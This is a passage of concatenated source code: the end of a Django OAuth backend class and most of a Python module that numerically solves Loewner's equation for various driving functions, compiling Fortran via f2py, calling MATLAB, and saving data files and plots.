url(r'^%s/?$' % join_urls(self.endpoints_prefix,
self.token_endpoint.rstrip('/')),
self.token_view,
name='%s_token' % self.id),
)
return _patterns
def is_uri(self, string):
validator = URLValidator()
try:
validator(string)
except ValidationError:
return False
else:
return True
def get_login_uri(self):
return reverse('login')
@staticmethod
def urlencode(params):
if hasattr(params, 'urlencode') and \
callable(getattr(params, 'urlencode')):
return params.urlencode()
for k in params:
params[smart_str(k)] = smart_str(params.pop(k))
return urllib.urlencode(params)
@staticmethod
def normalize(url):
return urltools.normalize(iri_to_uri(url))
class AstakosBackend(DjangoBackend):
pass
|
ucapdak/loewner | refs/heads/master | main/PythonTools/LoewnerRun.py | 1 | from Constants import *
import matplotlib.pyplot as plt
from subprocess import check_output, CalledProcessError
import matlab.engine
from mpmath import findroot, cot
from cmath import log
from cmath import sqrt as csqrt
from cmath import cos as ccos
from cmath import sin as csin
from math import pi, sin, floor, cos, sqrt
from numpy import empty, column_stack, savetxt, complex128, zeros, linspace, copy, roots, array
from importlib import import_module
plt.style.use('ggplot')
class LoewnerRun:
def __init__(self, index, start_time, final_time, outer_points, inner_points, compile_fortran = True, save_data = True, save_plot = True):
# Assign the driving function index
self.index = index
# Assign the module code
self.module_code = str(index)
# Determine the filename of the relevant Fortran file
self.forward_filename = FOR_LOEWNER + "/" + FOR_LOEWNER + FORTRAN_EXT
self.inverse_filename = INV_LOEWNER + "/" + INV_LOEWNER + FORTRAN_EXT
# Set a filename for the compiled module
self.forward_module_name = "modules." + FOR_LOEWNER + "_" + self.module_code
self.inverse_module_name = "modules." + INV_LOEWNER
# Set the data-saving parameters
self.save_data = save_data
self.save_plot = save_plot
# Set the time and resolution parameters
self.start_time = start_time
self.final_time = final_time
self.outer_points = outer_points
self.inner_points = inner_points
# Create a null variable for the quadratic forward results (Used to check if the quadratic forward algorithm has been executed)
self.forward_resuls = None
# Set the compilation parameter
self.compile_fortran = compile_fortran
# Compile the modules (Not necessary unless the Fortran files have changed since last compilation)
if compile_fortran:
self.compile_modules()
# Declare constants used in special driving function cases
self.constant = 0
self.kappa = 0
self.alpha = 0
# Obtain the names and lambda function for the given driving function
if index == 2:
self.name = "cos(t)"
self.latex_name = "$\\xi (t) = \cos(t)$"
self.xi = lambda t: cos(t)
elif index == 3:
self.name = "t * cos(t)"
self.latex_name = "$\\xi (t) = t \ \cos(t)$"
self.xi = lambda t: t * cos(t)
elif index == 4:
self.name = "cos(t * pi)"
self.latex_name = "$\\xi (t) = \cos(\pi t)$"
self.xi = lambda t: cos(pi * t)
elif index == 5:
self.name = "t * cos(t * pi)"
self.latex_name = "$\\xi (t) = t \ \cos(\pi t)$"
self.xi = lambda t: t * cos(pi * t)
elif index == 6:
self.name = "sin(t)"
self.latex_name = "$\\xi (t) = \sin(t)$"
self.xi = lambda t: sin(t)
elif index == 7:
self.name = "t * sin(t)"
self.latex_name = "$\\xi (t) = t \ \sin(t)$"
self.xi = lambda t: t * sin(t)
elif index == 8:
self.name = "sin(t * pi)"
self.latex_name = "$\\xi (t) = \sin(\pi t)$"
self.xi = lambda t: sin(pi * t)
elif index == 9:
self.name = "t * sin(t * pi)"
self.latex_name = "$\\xi (t) = t \ \sin(\pi t)$"
self.xi = lambda t: t * sin(pi * t)
elif index == 12:
self.name = "floor(t)"
self.latex_name = "$\\xi (t) = \lfloor t \\rfloor $"
self.xi = lambda t: floor(t)
elif index == 13:
self.name = "floot(t) % 2"
self.latex_name = "$\\xi (t) = \lfloor t \\rfloor \ \\mathrm{mod} \ 2$"
self.xi = lambda t: floor(t) % 2
# Create the properties string (Used for creating filenames)
if not SQUAREROOT_DRIVING(index):
self.set_properties_string()
self.set_short_properties_string()
# Construct the exact solution for time
self.exact_time_sol = linspace(self.start_time, self.final_time, self.outer_points)
def set_properties_string(self):
# Place the parameters of the run into a list
properties = [self.index, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.properties_string = "-".join(desc)
def set_short_properties_string(self):
# Place the parameters of the run into a list
properties = [self.index, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.short_properties_string = "-".join(desc)
def number_to_string(self, num):
# Convert a number to a string (used for making filenames)
# Shows 5 decimal places
num_str = "%8.5f" % num
# Remove stray whitespace
num_str = num_str.strip()
# Remove excess zeroes from the end of the string (e.g. 12.000000 -> 12)
for i in range(len(num_str)-1,0,-1):
if num_str[i] == "0":
num_str = num_str[:-1]
else:
break
if num_str[-1] == ".":
num_str = num_str[:-1]
# Put the word point in place of the decimal point (avoid confusing filesystem about extension)
return num_str.replace(".","point")
def compile_modules(self):
# Create a string that is used to compile the forward fortran file with f2py
self.compile_forward = F2PY_FIRST + ["-DCASE=" + self.module_code] \
+ [self.forward_filename, "-m", \
self.forward_module_name]
# Create a string that is used to compile the inverse fortran file with f2py
self.compile_inverse = F2PY_FIRST \
+ [self.inverse_filename, "-m", \
self.inverse_module_name]
# Iterate through the modules
for command in [self.compile_forward, self.compile_inverse]:
# Attempt to compile the module
try:
check_output(command)
# Display an error if the module could not be compiled (Typically means there is a problem in the Fortran code)
except CalledProcessError:
print("Error: Could not compile module " + " ".join(command))
exit()
def save_to_dat(self, filename, results_array):
# Save the results to a dat file
savetxt(filename, results_array, fmt=DATA_PREC)
def set_plot_title(self):
# Prepare the plot title
plt.title(self.latex_name, fontsize = 19, color = "black", y = 1.02, usetex = True)
def quadratic_forward_plot(self):
# Plot the values
plt.plot(self.forward_results.real, self.forward_results.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(FORWARD_PLOT_OUTPUT + self.properties_string + PLOT_EXT, bbox_inches='tight')
def quadratic_inverse_plot(self,exact=False):
# Decide whether the numerical or exact solution is plotted
if exact is False:
time_arr = self.time_arr
driving_arr = self.driving_arr
properties = self.properties_string
output = INVERSE_PLOT_OUTPUT
else:
time_arr = self.exact_time_sol
driving_arr = self.exact_driving_arr
properties = self.short_properties_string
output = EXACT_INVERSE_PLOT_OUTPUT
# Plot the values
plt.plot(time_arr, driving_arr, color='crimson')
# Set the axes labels
plt.xlabel(INV_PLOT_XL)
plt.ylabel(INV_PLOT_YL)
# Set the lower limit of the x-axis
plt.xlim(left=self.start_time)
# Save the plot to the filesystem
plt.savefig(output + properties + PLOT_EXT, bbox_inches='tight')
def cubic_forward_plot(self):
# Plot the values
plt.plot(self.cubic_results_a.real, self.cubic_results_a.imag, color='crimson')
plt.plot(self.cubic_results_b.real, self.cubic_results_b.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(CUBIC_PLOT_OUTPUT + self.properties_string + PLOT_EXT, bbox_inches='tight')
def finger_growth_plot(self):
# Plot the values
plt.plot(self.finger_results_a.real, self.finger_results_a.imag, color='crimson')
plt.plot(self.finger_results_b.real, self.finger_results_b.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(FINGER_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
def wedge_growth_plot(self, wedge_properties_string):
# Plot the values
plt.plot(self.wedge_results.real, self.wedge_results.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(WEDGE_PLOT_OUTPUT + wedge_properties_string + PLOT_EXT, bbox_inches='tight')
def quadratic_forward_loewner(self):
# Import the compiled Forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare an empty complex array for the results
self.forward_results = empty(self.outer_points, dtype=complex128)
# Solve Loewner's equation with the given parameters
ForwardLoewner.quadraticloewner(self.start_time, self.final_time, self.inner_points, self.forward_results)
if self.save_data:
# Convert the results to a 2D array
results_array = column_stack((self.forward_results.real, self.forward_results.imag))
# Create a filename for the dat file
filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.quadratic_forward_plot()
def quadratic_inverse_loewner(self):
# Check if the quadratic forward function has been executed
if self.forward_results is None:
print("Error: No quadratic forward results to use for inverse algorithm.")
exit()
# Import the compiled Inverse Loewner module
InverseLoewner = import_module(self.inverse_module_name)
# Declare empty arrays for the time and driving function values
self.driving_arr = empty(self.outer_points, dtype=float)
self.time_arr = empty(self.outer_points, dtype=float)
# Carry out the Inverse algorithm using the results of the forward run
InverseLoewner.inverseloewner(self.forward_results, self.driving_arr, self.time_arr, self.outer_points)
if self.save_data:
# Convert the results to a 2D array
results_array = column_stack((self.time_arr, self.driving_arr))
# Create a filename for the dat file
filename = INVERSE_DATA_OUTPUT + self.properties_string + DATA_EXT
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.quadratic_inverse_plot()
def exact_inverse(self):
# Find the exact solution for the driving function
self.exact_driving_arr = array([self.xi(t) for t in self.exact_time_sol])
if self.save_data:
# Convert the results to a 2D array
results_array = column_stack((self.exact_time_sol, self.exact_driving_arr))
# Create a filename for the dat file
filename = EXACT_INVERSE_DATA_OUTPUT + self.short_properties_string + DATA_EXT
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.quadratic_inverse_plot(exact=True)
def cubic_forward_loewner(self):
# Import the compiled Forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare empty complex arrays for the results
self.cubic_results_a = empty(self.outer_points, dtype=complex128)
self.cubic_results_b = empty(self.outer_points, dtype=complex128)
# Carry out the Cubic algorithm
ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b)
if self.save_data:
# Create filenames for the data files
filename_a = CUBIC_DATA_OUTPUT + self.properties_string + "-A" + DATA_EXT
filename_b = CUBIC_DATA_OUTPUT + self.properties_string + "-B" + DATA_EXT
# Create 2D arrays from the real and imaginary values of the results
array_a = column_stack((self.cubic_results_a.real,self.cubic_results_a.imag))
array_b = column_stack((self.cubic_results_b.real,self.cubic_results_b.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename_a, array_a)
self.save_to_dat(filename_b, array_b)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.cubic_forward_plot()
def finger_growth(self):
# Declare empty complex arrays for the results
self.finger_results_a = empty(self.outer_points, dtype=complex128)
self.finger_results_b = empty(self.outer_points, dtype=complex128)
# Find all the values of the driving function
xi_sol = [self.xi(t) for t in self.exact_time_sol]
# Set the first values of the solution
self.finger_results_a[0] = xi_sol[0]
self.finger_results_b[0] = -xi_sol[0]
# Define a 'weight' for the equation
d = 1
# Obtain the value of delta t
delta_t = self.exact_time_sol[1]
# Set an increment for obtaining an initial guess for the nonlinear solver
increment = delta_t * 1j
# Define a non-linear function for obtaining the fingered growth solution
def f(g_current, g_previous, xi_t):
return delta_t * d * HALF_PI * ccos(HALF_PI * g_current) + (g_current - g_previous)*(csin(HALF_PI * g_current) - csin(HALF_PI * xi_t))
# Use the Secant method for finding the first point of the finger solution
self.finger_results_a[1] = findroot(lambda g: f(g, self.finger_results_a[0], xi_sol[0]), self.finger_results_a[0] + increment, solver='secant', tol=TOL)
self.finger_results_b[1] = findroot(lambda g: f(g, self.finger_results_b[0], -xi_sol[0]), self.finger_results_b[0] + increment, solver='secant', tol=TOL)
# Iterate through the exact time values
for i in range(2,self.outer_points):
# Use the Secant method for finding the remaining finger solution
self.finger_results_a[i] = findroot(lambda g: f(g, self.finger_results_a[i - 1], xi_sol[i]), self.finger_results_a[i - 1], solver='secant', tol=TOL)
self.finger_results_b[i] = findroot(lambda g: f(g, self.finger_results_b[i - 1], -xi_sol[i]), self.finger_results_b[i - 1], solver='secant', tol=TOL)
if self.save_data:
# Create filenames for the dat files
filename_a = FINGER_DATA_OUTPUT + self.short_properties_string + "-A" + DATA_EXT
filename_b = FINGER_DATA_OUTPUT + self.short_properties_string + "-B" + DATA_EXT
# Create 2D arrays from the real and imaginary values of the results
array_a = column_stack((self.finger_results_a.real, self.finger_results_a.imag))
array_b = column_stack((self.finger_results_b.real, self.finger_results_b.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename_a, array_a)
self.save_to_dat(filename_b, array_b)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.finger_growth_plot()
def wedge_growth(self, wedge_alpha):
# Declare empty complex arrays for the results
self.wedge_results = empty(self.outer_points, dtype=complex128)
# Start the Matlab engine
eng = matlab.engine.start_matlab()
# Declare variables in the Matlab workspace for solving Loewner's equation
eng.workspace['index'] = self.index
eng.workspace['start_time'] = self.start_time
eng.workspace['final_time'] = self.final_time
eng.workspace['outer_points'] = self.outer_points
eng.workspace['inner_points'] = self.inner_points
eng.workspace['wedge_alpha'] = wedge_alpha
eng.workspace['fast'] = 0 # Use the 'slow' mode because parfor loops don't seem to work within the Matlab engine for Python :(
# Declare parameters for the 'special' driving functions
eng.workspace['constant'] = self.constant
eng.workspace['kappa'] = self.kappa
# Instruct the workspace to look for files in the Wedge directory
eng.eval('addpath("WedgeLoewner")')
# Carry out the algorithm for solving the wedge case of Loewner's equation
wedge_result = eng.eval('SolveWedgeLoewner(index,start_time,final_time,inner_points,outer_points,wedge_alpha,fast,constant,kappa)',nargout=1)
# Stop the Matlab engine once the function returns
eng.quit()
# Convert the Matlab data to a numpy array
for i in range(self.outer_points):
self.wedge_results[i] = wedge_result[0][i]
# Represent the alpha value as a string
alpha_string = self.number_to_string(wedge_alpha)
# Create a properties sring for the run
wedge_properties_string = "-".join([str(attr) for attr in [self.index, alpha_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]])
if self.save_data:
# Create a filename for the dat file
filename = WEDGE_DATA_OUTPUT + wedge_properties_string + DATA_EXT
# Create a 2D array from the real and imaginary values of the results
results_array = column_stack((self.wedge_results.real, self.wedge_results.imag))
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.wedge_growth_plot(wedge_properties_string)
class ConstantLoewnerRun(LoewnerRun):
def __init__(self, constant, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
# Invoke the superclass initialiser
LoewnerRun.__init__(self, CONST_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
# Set the constant value
self.constant = constant
# Set the names and lambda function for the given driving function
self.name = "Constant"
self.latex_name = "$\\xi (t) = " + str(self.constant) + "$"
self.xi = lambda t: self.constant
# Set the latex name for the exact cubic case
self.exact_cubic_latex_name = "$\\xi (t) = " + str(EXACT_CUBIC_CONSTANT) + "$"
def quadratic_forward_loewner(self):
# Import the compiled Forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare an empty complex array for the results
self.forward_results = empty(self.outer_points, dtype=complex128)
# Solve Loewner's equation with the given parameters
ForwardLoewner.quadraticloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresult=self.forward_results, constantdrivingarg=self.constant)
if self.save_data:
# Create a filenames for the dat files
filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
# Create a 2D array from the real and imaginary values of the raw results and translated results
results_array = column_stack((self.forward_results.real, self.forward_results.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.quadratic_forward_plot()
def cubic_forward_loewner(self):
# Import the compiled Forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare empty complex arrays for the results
self.cubic_results_a = empty(self.outer_points, dtype=complex128)
self.cubic_results_b = empty(self.outer_points, dtype=complex128)
# Solve Loewner's equation with the given parameters
ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b, constdrivingarg=self.constant)
if self.save_data:
# Create filenames for the data files
filename_a = CUBIC_DATA_OUTPUT + self.properties_string + "-A" + DATA_EXT
filename_b = CUBIC_DATA_OUTPUT + self.properties_string + "-B" + DATA_EXT
# Create 2D arrays from the real and imaginary values of the results
array_a = column_stack((self.cubic_results_a.real,self.cubic_results_a.imag))
array_b = column_stack((self.cubic_results_b.real,self.cubic_results_b.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename_a, array_a)
self.save_to_dat(filename_b, array_b)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.cubic_forward_plot()
def exact_cubic_forward_loewner(self):
# Declare empty complex arrays for the exact results
self.exact_cubic_sol_a = zeros(self.outer_points, dtype = complex128)
self.exact_cubic_sol_b = zeros(self.outer_points, dtype = complex128)
# Define a function for generating an initial guess to be used by the non-linear solver
def initial_guess(t):
return 1 + 1j * sqrt(2*t) - (1./3) * t
# Define the non-linear function for obtaining the exact solution
def exact_solution(z,t):
return z**2 - 2*log(z) - 1 + 4*t
# Iterate through the exact time values
for i in range(self.outer_points):
# Use Muller's method for finding the exact solution
self.exact_cubic_sol_a[i] = findroot(lambda z: exact_solution(z, self.exact_time_sol[i]), initial_guess(self.exact_time_sol[i]), solver='muller', tol=TOL)
# Obtain the solution to the second trace by changing the sign of the real component
self.exact_cubic_sol_b[i] = -self.exact_cubic_sol_a[i].real + self.exact_cubic_sol_a[i].imag * 1j
if self.save_data:
# Create filenames for the dat files
filename_a = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-A" + DATA_EXT
filename_b = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-B" + DATA_EXT
# Create 2D arrays from the real and imaginary values of the results
array_a = column_stack((self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag))
array_b = column_stack((self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename_a, array_a)
self.save_to_dat(filename_b, array_b)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set a new plot title for the exact solution case (Uses a particular constant)
plt.title(self.exact_cubic_latex_name, fontsize = 19, color = "black", y = 1.02, usetex = True)
# Plot the values
plt.plot(self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag, color='crimson')
plt.plot(self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(EXACT_CUBIC_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
class LinearLoewnerRun(LoewnerRun):
def __init__(self, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
# Invoke the superclass initialiser
LoewnerRun.__init__(self, LINR_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
# Set the names and lambda function for the given driving function
self.name = "t"
self.latex_name = "$\\xi (t) = t$"
self.xi = lambda t: t
def exact_quadratic_forward_loewner(self):
# Declare an empty complex array for the exact results
self.exact_quadratic_forward = zeros(self.outer_points,dtype = complex128)
# Define a function for generating an initial guess to be used by the non-linear solver
def initial_guess(t):
return 2 * 1j * sqrt(t) + (2./3) * t
# Define the non-linear function for obtaining the exact solution
def exact_solution(z,t):
return z + 2 * log(2 - z) - 2 * log(2) - t
# Iterate through the exact time values
for i in range(self.outer_points):
# Use Muller's method for finding the exact solution
self.exact_quadratic_forward[i] = findroot(lambda z: exact_solution(z, self.exact_time_sol[i]), initial_guess(self.exact_time_sol[i]), solver='muller', tol=TOL)
if self.save_data:
# Create a filename for the dat file
filename = EXACT_FORWARD_DATA_OUTPUT + self.short_properties_string + DATA_EXT
# Create a 2D array from the real and imaginary values of the results
results_array = column_stack((self.exact_quadratic_forward.real, self.exact_quadratic_forward.imag))
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plo the values
plt.plot(self.exact_quadratic_forward.real, self.exact_quadratic_forward.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(EXACT_FORWARD_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
def phi_quadratic_exact(self,start_phi=0,final_phi=pi):
# Calculate 'temp' delta
delta = (final_phi - start_phi) / self.outer_points
# Increase starting point if start_phi = 0
if start_phi == 0:
start_phi = delta
# Decrease end point if final_phi = pi
if final_phi == pi:
final_phi = final_phi - delta
# Discretise the interval from start_phi to final_phi
discr_pi = linspace(start_phi,final_phi,self.outer_points)
# Solve Eq. 24 (Kager et al. 2004) on the range start_phi to final_phi
self.phi_exact_quadratic_forward = array([2 - 2 * phi * cot(phi) + 2 * 1j * phi for phi in discr_pi],dtype=complex128)
# Create a properties string specifically for the phi exact solution
properties_string = "-".join([str(prop) for prop in [self.index, "PHI", self.number_to_string(start_phi), self.number_to_string(final_phi), self.outer_points]])
if self.save_data:
# Create a filename for the dat file
filename = EXACT_FORWARD_DATA_OUTPUT + properties_string + DATA_EXT
# Create a 2D array from the real and imaginary values of the results
results_array = column_stack((self.phi_exact_quadratic_forward.real, self.phi_exact_quadratic_forward.imag))
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plo the values
plt.plot(self.phi_exact_quadratic_forward.real, self.phi_exact_quadratic_forward.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(EXACT_FORWARD_PLOT_OUTPUT + properties_string + PLOT_EXT, bbox_inches='tight')
class KappaLoewnerRun(LoewnerRun):
def __init__(self, kappa, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
# Invoke the superclass initialiser
LoewnerRun.__init__(self, KAPPA_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
# Set the kappa value
self.kappa = kappa
# Generate a properties string for the kappa case (Used for creating filenames)
self.set_properties_string()
self.set_short_properties_string()
# Create the names and lambda function for the given driving function
self.name = "2 * dsqrt(kappa * (1 - t))"
self.latex_name = "$\\xi (t) = 2 \ \sqrt{" + str(self.kappa)[:4] + "\ (1 - t)}$"
self.xi = lambda t: 2 * sqrt(self.kappa * (1 - t))
def set_properties_string(self):
# Convert the kappa parameter to a string
sqrt_string = self.number_to_string(self.kappa)
# Create a list from the run parameters
properties = [self.index, sqrt_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.properties_string = "-".join(desc)
def set_short_properties_string(self):
# Convert the kappa parameter to a string
sqrt_string = self.number_to_string(self.kappa)
# Create a list from the run parameters
properties = [self.index, sqrt_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.short_properties_string = "-".join(desc)
def quadratic_forward_loewner(self):
# Import the compiled forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare an empty complex array for the results
self.forward_results = empty(self.outer_points, dtype=complex128)
# Solve Loewner's equation with the given parameters
ForwardLoewner.quadraticloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresult=self.forward_results, sqrtdrivingarg=self.kappa)
# Create a copy of the results
self.translated_results = copy(self.forward_results)
# Determine the distance from the first point to the origin
offset = self.translated_results[0].real
# Shift the copy so that the trace begins at the origin
for i in range(self.outer_points):
self.translated_results[i] -= offset
if self.save_data:
# Obtain the filenames for both the raw and translated results
filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
translated_filename = FORSHIFT_DATA_OUTPUT + self.properties_string + DATA_EXT
# Create an array for the combined filenames and combined results
combined_filenames = [filename, translated_filename]
combined_results = [self.forward_results, self.translated_results]
for result, filename in zip(combined_results, combined_filenames):
# Convert the result to a 2D array
results_array = column_stack((result.real, result.imag))
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Obtain the filenames for both the raw and translated results
filename = FORWARD_PLOT_OUTPUT + self.properties_string + PLOT_EXT
translated_filename = FORSHIFT_PLOT_OUTPUT + self.properties_string + PLOT_EXT
# Create an array for the combined filenames and combined results
combined_filenames = [filename, translated_filename]
combined_results = [self.forward_results, self.translated_results]
for result, filename in zip(combined_results, combined_filenames):
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the values
plt.plot(result.real, result.imag, color='crimson')
# Set the axes labels
plt.xlabel(FOR_PLOT_XL)
plt.ylabel(FOR_PLOT_YL)
# Set the lower limit of the y-axis
plt.ylim(bottom=0)
# Save the plot to the filesystem
plt.savefig(filename, bbox_inches='tight')
def cubic_forward_loewner(self):
# Import the compiled Forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare empty complex arrays for the results
self.cubic_results_a = empty(self.outer_points, dtype=complex128)
self.cubic_results_b = empty(self.outer_points, dtype=complex128)
# Solve Loewner's equation with the given parameters
ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b, sqrtdrivingarg=self.kappa)
if self.save_data:
# Create filenames for the data files
filename_a = CUBIC_DATA_OUTPUT + self.properties_string + "-A" + DATA_EXT
filename_b = CUBIC_DATA_OUTPUT + self.properties_string + "-B" + DATA_EXT
# Create 2D arrays from the real and imaginary values of the results
array_a = column_stack((self.cubic_results_a.real,self.cubic_results_a.imag))
array_b = column_stack((self.cubic_results_b.real,self.cubic_results_b.imag))
# Save the arrays to the filesystem
self.save_to_dat(filename_a, array_a)
self.save_to_dat(filename_b, array_b)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.cubic_forward_plot()
class CAlphaLoewnerRun(LoewnerRun):
def __init__(self, alpha, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
# Invoke the superclass initialiser
LoewnerRun.__init__(self, CALPHA_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
# Set the value for alpha
self.alpha = alpha
# Obtain the value for calpha
self.calpha = (2 - 4 * alpha) / sqrt(alpha - alpha**2)
# Create a properties string for the calpha case (Used for creating filenames)
self.set_properties_string()
self.set_short_properties_string()
# Create the names and lambda function for the given driving function
self.name = "dsqrt(t) * c_alpha"
self.latex_name = "$\\xi (t) = c_{" + str(self.alpha)[:4] + "} \sqrt{t}$"
self.xi = lambda t: self.calpha * sqrt(t)
def set_properties_string(self):
# Convert the alpha parameter to a string
sqrt_string = self.number_to_string(self.alpha)
# Create a list from the run parameters
properties = [self.index, sqrt_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.properties_string = "-".join(desc)
def set_short_properties_string(self):
# Convert the alpha parameter to a string
sqrt_string = self.number_to_string(self.alpha)
# Create a list from the run parameters
properties = [self.index, sqrt_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.short_properties_string = "-".join(desc)
def quadratic_forward_loewner(self):
# Import the compiiled Forward Loewner module
ForwardLoewner = import_module(self.forward_module_name)
# Declare an empty complex array for the results
self.forward_results = empty(self.outer_points, dtype=complex128)
# Solve Loewner's equation with the given parameters
ForwardLoewner.quadraticloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresult=self.forward_results, sqrtdrivingarg=self.alpha)
if self.save_data:
# Convert the results to a 2D array
results_array = column_stack((self.forward_results.real, self.forward_results.imag))
# Create a filename for the dat file
filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
# Save the array to the filesystem
self.save_to_dat(filename, results_array)
if self.save_plot:
# Clear any preexisting plots to be safe
plt.cla()
# Set the plot title
self.set_plot_title()
# Plot the data and save it to the filesystem
self.quadratic_forward_plot()
def cubic_forward_loewner(self):
